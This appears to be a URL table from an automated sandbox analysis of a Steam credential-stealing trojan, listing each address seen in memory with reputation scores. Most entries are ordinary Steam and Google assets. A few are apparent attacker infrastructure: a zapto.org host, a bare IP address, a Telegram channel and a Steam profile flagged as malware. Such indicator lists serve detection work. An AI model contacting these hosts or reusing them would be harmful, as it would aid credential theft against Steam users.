          https://www.youtube.comSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.comSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          		unknown
          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199747278259/badgesSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          https://188.245.87.202/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • 16%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://s.ytimg.com;SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto.org/nSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://steam.tv/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WRaHSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://store.steampowered.com/privacy_agreement/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/points/shop/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto.org38.149SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://sketchfab.comSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://lv.queniujq.cnSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://www.youtube.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/privacy_agreement/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=enSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=puGcKUBVSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.google.com/recaptcha/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://188.245.87.202/rosoftSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://checkout.steampowered.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199747278259exSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto.orgSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://188.245.87.202/0SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/;SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/about/76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/my/wishlist/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://t.me/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://188.245.87.202/TSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          		unknown
          https://web.telegram.orgSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://t.me/armad2ahellosqls.dllsqlite3.dllInSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://help.steampowered.com/en/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/market/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://store.steampowered.com/news/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto..5938.149SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://store.steampowered.com/subscriber_agreement/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/profiles/76561199747278259/inventory/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: malware
          		unknown
          https://recaptcha.net/recaptcha/;SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zaptoSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://188.245.87.20276561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://steamcommunity.com/discussions/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=09hfUHwxDUY7&l=eSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://arpdabl.zapto.org/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
